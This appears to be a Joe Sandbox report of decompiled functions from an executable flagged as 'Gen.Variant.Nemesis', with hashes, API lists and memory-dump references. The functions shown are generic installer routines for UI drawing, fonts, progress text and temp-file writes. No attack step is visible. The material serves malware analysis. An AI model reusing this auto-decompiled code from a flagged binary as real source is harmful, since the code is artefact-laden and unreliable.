*?|<>/":, xrefs: 00406568
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00406516

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1299859864
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00404290
0x00404324
0x00000000
0x00404324
0x004042a1
0x004042a5
0x00000000
0x00000000
0x004042ab
0x004042b4
0x004042b7
0x004042b7
0x004042bd
0x004042c3
0x004042c3
0x004042cf
0x004042d5
0x004042dc
0x004042df
0x004042e2
0x004042e4
0x004042e4
0x004042ec
0x004042f2
0x004042f2
0x004042fc
0x00404301
0x00404304
0x00404309
0x0040430c
0x0040430c
0x0040431c
0x0040431c
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040429B
GetSysColor.USER32(00000000), ref: 004042B7
SetTextColor.GDI32(?,00000000), ref: 004042C3
SetBkMode.GDI32(?,?), ref: 004042CF
GetSysColor.USER32(?), ref: 004042E2
SetBkColor.GDI32(?,?), ref: 004042F2
DeleteObject.GDI32(?), ref: 0040430C
CreateBrushIndirect.GDI32(?), ref: 00404316

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BB0(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404bbe
0x00404bcb
0x00404bd1
0x00404c0f
0x00404c0f
0x00404c1e
0x00404c25
0x00000000
0x00404c27
0x00404bd3
0x00404be2
0x00404bea
0x00404bed
0x00404bff
0x00404c05
0x00404c0c
0x00000000
0x00404c0c
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
GetMessagePos.USER32 ref: 00404BD3
ScreenToClient.USER32(?,?), ref: 00404BED
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25

Strings

f, xrefs: 00404C01

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cde8 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdef = 1;
				 *0x40cdec = _t15 & 0x00000001;
				 *0x40cded = _t15 & 0x00000002;
				 *0x40cdee = _t15 & 0x00000004;
				E004062A4(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdd8);
				_push(_t18);
				_push(_t33);
				E004061C9();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38

Strings

Calibri, xrefs: 00401E1E

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x4169f8; // 0x81503
					_t11 =  *0x422a04; // 0x81c18
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(00081503,00000064,00081C18), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004028A7(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BCA(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D4F(_t50);
				_t26 = E00405D74(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x434ef8;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040332B(_t45);
						E00403315(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							E004030FA( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D2F( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E26( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40add0 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061E2(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E55(_t34, _t34) >= 0) {
						_t14 = E00405E26(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634
